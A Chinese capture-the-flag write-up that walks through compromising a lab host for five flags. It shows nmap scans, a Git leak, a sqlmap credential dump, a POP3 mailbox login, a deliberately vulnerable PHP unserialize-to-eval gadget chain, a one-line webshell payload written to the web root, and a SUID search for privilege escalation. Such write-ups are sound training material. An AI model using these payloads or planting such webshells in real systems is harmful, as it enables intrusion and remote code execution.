前言:个人打的最多的一个机子,赛后向学长和师傅要了wp整理复盘了一下

题目共包含五处flag
172.16.160.40

正常的思路是先进行nmap和dir

nmap扫到了以下目录

25/tcp   open  smtp     Postfix smtpd
|_smtp-commands: work.com, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN
80/tcp   open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-git:
|   172.16.160.40:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: flag commit
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Gitlab
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
110/tcp  open  pop3     Dovecot pop3d ([XCLIENT])
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA PIPELINING RESP-CODES STLS UIDL AUTH-RESP-CODE TOP SASL(PLAIN) USER
111/tcp  open  rpcbind  2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
143/tcp  open  imap     Dovecot imapd
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
|_imap-capabilities: Pre-login listed post-login have SASL-IR ENABLE LOGIN-REFERRALS more capabilities LITERAL+ STARTTLS ID IMAP4rev1 IDLE AUTH=PLAINA0001 OK
443/tcp  open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34)
| http-methods:
|   Supported Methods: GET HEAD POST OPTIONS TRACE
|_  Potentially risky methods: TRACE
|_http-title: Gitlab
| http-git:
|   172.16.160.40:443/.git/
|     Git repository found!
|     Repository description: Unnamed repository; edit this file 'description' to name the...
|_    Last commit message: flag commit
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Issuer: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-18T09:02:14
| Not valid after:  2023-11-18T09:02:14
| MD5:   3c47:9ba9:c35e:d7da:dd8d:92b8:5653:3f9e
|_SHA-1: 67dc:6f7f:f385:fe12:d7a8:9d88:df12:b572:97db:f35a
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.2.34
|_ssl-date: TLS randomness does not represent time
993/tcp  open  ssl/imap Dovecot imapd
|_imap-capabilities: Pre-login post-login have SASL-IR ENABLE LOGIN-REFERRALS more listed capabilities LITERAL+ ID AUTH=PLAINA0001 IDLE IMAP4rev1 OK
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_ssl-date: TLS randomness does not represent time
995/tcp  open  ssl/pop3 Dovecot pop3d ([XCLIENT])
| ssl-cert: Subject: commonName=imap.example.com
| Issuer: commonName=imap.example.com
| Public Key type: rsa
| Public Key bits: 3072
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-11-28T16:40:31
| Not valid after:  2023-11-28T16:40:31
| MD5:   e80c:698b:0ca6:1fc3:6d60:31eb:9cfc:b849
|_SHA-1: d211:674c:69e4:7c54:2152:3034:e88e:0562:011b:6362
|_pop3-capabilities: CAPA UIDL SASL(PLAIN) AUTH-RESP-CODE TOP RESP-CODES USER PIPELINING
|_ssl-date: TLS randomness does not represent time
3306/tcp open  mysql    MySQL (unauthorized)
9999/tcp open  http     nginx 1.24.0
|_http-server-header: nginx/1.24.0
|_http-title: 403 Forbidden

flag1

根据信息是有git的,使用githack进行恢复,其中有一个flag.php,其中显示的是no here,可以使用git log进行查询

对1d那条信息进行reset恢复,可以拿到flag1

flag2

根据443端口,常见的考点是改hosts,同时直接访问ip的9999端口是不能进行访问的,查看前端的网页源码是有给

gitlab.example.com

修改以下hosts

前端通过目录扫描存在/login.html,可以直接绕过,尝试直接sqlmap进行爆库内容

+----+-------+--------+---------+----------------------------------+
| id | icon  | name   | address | password                         |
+----+-------+--------+---------+----------------------------------+
| 1  | 1.jpg | admin  | 123123  | 64e39c60d69afe351b48472307add2c5 |
+----+-------+--------+---------+----------------------------------+

[13:44:35] [INFO] table 'mail.`admin`' dumped to CSV file 'C:\Users\0raN9e\AppData\Local\sqlmap\output\172.16.160.40\dump\mail\admin.csv'
[13:44:35] [INFO] fetching columns for table 'user' in database 'mail'
[13:44:35] [INFO] retrieved:
[13:44:35] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
5
[13:44:37] [INFO] retrieved: id
[13:44:43] [INFO] retrieved: username
[13:45:06] [INFO] retrieved: email
[13:45:19] [INFO] retrieved: login_time
[13:45:56] [INFO] retrieved: password
[13:46:24] [INFO] fetching entries for table 'user' in database 'mail'
[13:46:24] [INFO] fetching number of entries for table 'user' in database 'mail'
[13:46:24] [INFO] retrieved: 1
[13:46:25] [WARNING] (case) time-based comparison requires reset of statistical model, please wait.............................. (done)
ryan@work
[13:46:56] [INFO] retrieved: 1
[13:46:58] [INFO] retrieved: 2019-08-07 13:00:00
[13:48:04] [INFO] retrieved: circumstances
[13:48:39] [INFO] retrieved: ryan
Database: mail
Table: user
[1 entry]
+----+-----------+---------------+----------+---------------------+
| id | email     | password      | username | login_time          |
+----+-----------+---------------+----------+---------------------+
| 1  | ryan@work | circumstances | ryan     | 2019-08-07 13:00:00 |
+----+-----------+---------------+----------+---------------------+

重置ryan 邮箱

nc 连接登录 ryan/circumstances,收到邮件。

里面告诉了具体修改的内容,提醒你。然后在gitlab.example.com:9999/root/web/-/blob/main/user.php,最下面注释里藏有flag2

flag3

敏感pop3邮件,在邮件里藏有信息

└─$ nc 172.16.160.40 110
+OK [XCLIENT] Dovecot ready.
user ryan
+OK
pass circumstances
+OK Logged in.
list
+OK 1 messages:
1 1633
.
retr 1
+OK 1633 octets
Return-Path: <Amanda@work.com>
X-Original-To: ryan@work.com
Delivered-To: ryan@work.com
Received: from LAPTOP-N2NBA1RK (LAPTOP-N2NBA1RK [192.168.31.58])
        by work.com (Postfix) with ESMTP id 28B1C21E2F35
        for <ryan@work.com>; Mon,  3 Feb 2025 18:08:58 +0800 (CST)
Date: Mon, 3 Feb 2025 10:08:58 +0800
From: "Amanda@work.com" <Amanda@work.com>
To: ryan <ryan@work.com>
Subject: flag
X-Priority: 3
X-Has-Attach: no
X-Mailer: Foxmail 7.2.23.121[cn]
Mime-Version: 1.0
Message-ID: <202502031008578820300@work.com>
Content-Type: multipart/alternative;
        boundary="----=_001_NextPart335171644650_=----"

This is a multi-part message in MIME format.

------=_001_NextPart335171644650_=----
Content-Type: text/plain;
        charset="us-ascii"
Content-Transfer-Encoding: base64

ZmxhZzN7dmxnZThyZnEwYmFxYjZzNGduMjd5NWs5cnd1cjk5YjZ9DQoNCg0KDQpBbWFuZGFAd29y
ay5jb20NCg==

------=_001_NextPart335171644650_=----
Content-Type: text/html;
        charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

<html><head><meta http-equiv=3D"content-type" content=3D"text/html; charse=
t=3Dus-ascii"><style>body { line-height: 1.5; }body { font-size: 14px; fon=
t-family: "Microsoft YaHei UI"; color: rgb(0, 0, 0); line-height: 1.5; }</=
style></head><body>=0A<div><span></span>flag3{vlge8rfq0baqb6s4gn27y5k9rwur=
99b6}</div>=0A<div><br></div><hr style=3D"WIDTH: 210px; HEIGHT: 1px" color=
=3D"#b5c4df" size=3D"1" align=3D"left">=0A<div><span><div style=3D"MARGIN:=
 10px; FONT-FAMILY: verdana; FONT-SIZE: 10pt"><div>Amanda@work.com</div></=
div></span></div>=0A</body></html>
------=_001_NextPart335171644650_=------

pop3藏有flag3

flag4

坊间的两种思路

思路1

在进行目录扫描的时候在/assets/scripts/下面存在pass.php,可以直接getshell

使用grep -r -n flag查找flag,得到flag4

思路2

在之前的目录扫描里/backup/www.zip存在文件sqlhelper.php,内容如下

<?php 
class sqlhelper{
    private $mysqli;
    private static $host="127.0.0.1";
    private static $user="root";
    private static $pwd="******";
    private static $db="mail";
    public function  __construct()
    {
        $this->mysqli= new  mysqli(self::$host,self::$user,self::$pwd,self::$db);
        if($this->mysqli->connect_error){
            die("链接失败".$this->mysqli->connect_error);
        }
        $this->mysqli->query("set names utf8");
    }
    public function execute_dql($sql){
        $res=$this->mysqli->query($sql) ;
        return $res;
    }
    public function execute_dml($sql){
        $res=$this->mysqli->query($sql) ;
        if(!$res){
            return 0;
        }else{
            if($this->mysqli->affected_rows>0){
                return 1;
            }else{
                return 2;
            }
        }
    }
    public function close_sql(){
        $this->mysqli->close();
    }
}

if (isset($_POST['un']) && isset($_GET['x'])){
class allstart
{
        public $var1;
        public $var2;

        public function __construct()
        {
                $this->var1=new func1();
        }


        public function __destruct()
        {
                $this->var1->test1();
        }
}
class func1
{
        public $var1;
        public $var2;

        public function __construct()
        {
                $this->var1=new func2();
        }

        public function test1()
        {
            $this->var1->test2();
        }
}    
class func2
{
        public $var1;
        public $var2;

        public function __construct()
        {
                $this->var1=new func3();
        }

        public function __call($test2,$arr)
        {
                $s1 = $this->var1;
                $s1();
        }
}
class func3
{
        public $var1;
        public $var2;

        public function __construct()
        {
                $this->var1=new func4();
        }

        public function __invoke()
        {
                $this->var2 = "concat string".$this->var1;
        } 
}
class func4
{
        public $str1;
        public $str2;

        public function __construct()
        {
                $this->str1=new toget();
        }

        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class toget
{       public $todo;
        public function __construct()
        {
                $this->todo="system('ls');";
        }
        public function get_flag()
        {
                eval($this->todo); 
        }
}


unserialize($_POST['un']);
}
?>

直接new一个allstart就可以调用链子,在

 $this->todo="system('ls');";

进行修改,尝试写马进去

"file_put_contents('/var/www/html/1.php','<?php eval(\$_POST[1]);');";

之后的思路一致

flag5

进行提权

可以使用

find / -perm -4000 -type f -exec ls -la {} 2>/dev/null \;

在tmp目录下有一个del.py,可以利用该文件进行修改提权

flag则在/root 目录下的aim.jpg